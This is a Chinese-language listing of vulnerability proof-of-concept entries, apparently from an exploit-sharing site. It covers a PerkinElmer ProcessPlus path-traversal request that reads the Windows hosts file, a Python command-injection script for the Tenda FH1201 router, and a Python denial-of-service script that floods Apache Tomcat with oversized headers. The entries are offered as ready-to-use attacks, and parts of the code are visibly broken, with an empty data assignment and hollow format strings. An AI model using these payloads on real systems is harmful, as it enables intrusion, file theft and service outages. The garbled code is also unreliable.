找到
9
篇与
相关的结果
-
PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)pocGET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Ldwk: YmllY2hhb2xlc2I= Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 -
-
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)漏洞POCTenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中,然后执行,因此攻击者可利用此漏洞执行任意命令固件下载网址:https://www.tendacn.com/download/detail-3322.htmlPOC import requests ip = '192.168.74.145' url = "http://" + ip + "/goform/WriteFacMac" payload = ";echo 'hacker!'" data = response = requests.post(url, data=data) print(response.text)
-
Apache Tomcat拒绝服务漏洞(CVE-2024-24549) import http.client # Configuration host = "target-server" # Change this to the target server address port = 443 # Change this to the target server port (usually 443 for HTTPS) num_requests = 1000 # Number of requests to send def send_dos_requests(): try: # Create an HTTP/2 connection conn = http.client.HTTPSConnection(host, port, timeout=10) headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Test-Header": "A" * 65536 # Large header value to exceed limits } for i in range(num_requests): conn.request("POST", "/", headers=headers) response = conn.getresponse() print(f"Request : Status Code: ") conn.close() except Exception as e: print(f"[-] An error occurred: ") if __name__ == "__main__": print(f"Sending HTTP/2 requests to :") send_dos_requests() Apache Tomcat 11.0.0-M1 至 11.0.0-M16 Apache Tomcat 10.1.0-M1 至 10.1.18 Apache Tomcat 9.0.0-M1 至 9.0.85 Apache Tomcat 8.5.0 至 8.5.98
